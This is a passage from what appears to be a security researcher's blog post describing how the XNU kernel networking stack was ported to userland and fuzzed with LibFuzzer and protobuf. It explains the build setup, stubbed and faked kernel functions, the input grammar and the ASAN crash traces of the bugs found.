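// Minimal sketch, not sockfuzzer's exact code: wrap fuzzer-provided bytes
// in an mbuf and hand it to the same IPv4 entry point the DLIL layer uses.
void deliver_fuzzed_ipv4_packet(const uint8_t *data, size_t len)
{
  struct mbuf *m = fuzz_mbuf_create(len);  // hypothetical allocation helper
  memcpy(m->m_hdr.mh_data, data, len);     // raw packet bytes become the mbuf payload
  m->m_hdr.mh_len = (int32_t)len;
  ip_input(m);                             // void ip_input(struct mbuf *m)
}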

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.
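
In rough pseudocode (a simplification, not LibFuzzer’s actual scheduler), the loop looks like this; the helpers and the input_t type are illustrative placeholders.

// Rough pseudocode of the coverage-guided "hill climbing" loop described
// above; LibFuzzer's real scheduler is more sophisticated.
void fuzz_loop(void)
{
  for (;;) {
    input_t parent = pick_corpus_entry();  // an input with known coverage
    input_t child = mutate(parent);        // random mutation (protobuf-aware in our case)
    run_target(child);                     // executes the syscalls / ip_input calls it encodes
    if (saw_new_coverage())
      add_to_corpus(child);                // child becomes a base for further mutation
  }
}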

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target thanks to the fast edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation like void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. The same goal could be achieved with linker flags, but this was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c
)


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using the CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Because these wrappers are so simple and formulaic, I created a script, generate_fuzzer.py, that generates them automatically from syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.
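
As a toy illustration of that idea, using the database example from the paragraph above (db_put and db_get are hypothetical APIs, not anything in XNU), a semantic fake can be just a handful of lines that preserve only the behavior the caller relies on:

// Toy "high-level emulation" fake: an in-memory stand-in for a hypothetical
// database API. Good enough if we don't care about finding database bugs.
#include <string.h>

#define MAX_ENTRIES 64

static char g_keys[MAX_ENTRIES][32];
static char g_vals[MAX_ENTRIES][128];
static int g_count;

void db_put(const char *key, const char *val) {
  if (g_count >= MAX_ENTRIES) return;            // toy fake: silently drop overflow
  strncpy(g_keys[g_count], key, sizeof(g_keys[0]) - 1);
  strncpy(g_vals[g_count], val, sizeof(g_vals[0]) - 1);
  g_count++;
}

const char *db_get(const char *key) {
  for (int i = 0; i < g_count; i++)
    if (strcmp(g_keys[i], key) == 0)
      return g_vals[i];
  return NULL;                                   // not found
}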

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the pkthdr or m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately, ASAN can track these allocations, so we can detect some bugs with this modification.
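
A sketch of that simplified strategy is shown below. fuzz_mbuf_create is a stand-in name; the project’s real helper in fuzz/zalloc.c is more involved and tracks more of the mbuf metadata.

// Sketch of the simplified mbuf allocation described above: small payloads
// use the inline buffer, larger ones get an aligned external buffer and the
// M_EXT flag. Assumes XNU's mbuf definitions and <stdlib.h> are available.
struct mbuf *fuzz_mbuf_create(size_t len)
{
  struct mbuf *m = calloc(1, sizeof(struct mbuf));
  if (len <= _MLEN) {
    m->m_hdr.mh_data = m->M_dat.M_databuf;   // inline storage
  } else {
    void *ext = NULL;
    posix_memalign(&ext, 4096, len);         // aligned, and still visible to ASAN
    m->m_hdr.mh_data = ext;
    m->m_hdr.mh_flags |= M_EXT;              // data lives in an external buffer
  }
  m->m_hdr.mh_len = (int32_t)len;
  return m;
}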

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.
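
A sketch of that copyout counterpart, mirroring the copyin fake above, follows; the project’s actual signature and details may differ.

// Sketch of the copyout fake described above: the copy from the kernel-side
// source buffer always happens so ASAN can flag bad reads; a destination of
// (void*)1 means we don't care about the data, so it lands in scratch space.
int __attribute__((warn_unused_result))
copyout(void* kernel_addr, void* user_addr, size_t nbytes) {
  if (user_addr != (void*)1) {
    memcpy(user_addr, kernel_addr, nbytes);
    return 0;
  }
  void* scratch = malloc(nbytes);
  memcpy(scratch, kernel_addr, nbytes);  // the access itself is what we care about
  free(scratch);
  return 0;
}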

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service that kernels provide both to userland (e.g. /dev/random) and to in-kernel consumers that require it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.
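
A sketch of how that can be wired up: the get_fuzzed_bytes helper used by the copyin fake above draws from the same pool, and a fake of a kernel random-read routine can simply forward to it. The bookkeeping shown here is illustrative, not the project’s exact code.

// Illustrative backing store for fuzzed "randomness": bytes are consumed
// sequentially from the Session's data_provider field, falling back to
// zeros once it is exhausted so runs stay deterministic.
static const uint8_t *g_provider_data;
static size_t g_provider_size, g_provider_pos;

void get_fuzzed_bytes(void *dst, size_t n) {
  size_t avail = g_provider_size - g_provider_pos;
  size_t take = n < avail ? n : avail;
  memcpy(dst, g_provider_data + g_provider_pos, take);
  memset((uint8_t *)dst + take, 0, n - take);
  g_provider_pos += take;
}

// Example fake of a kernel randomness routine forwarding to the same pool.
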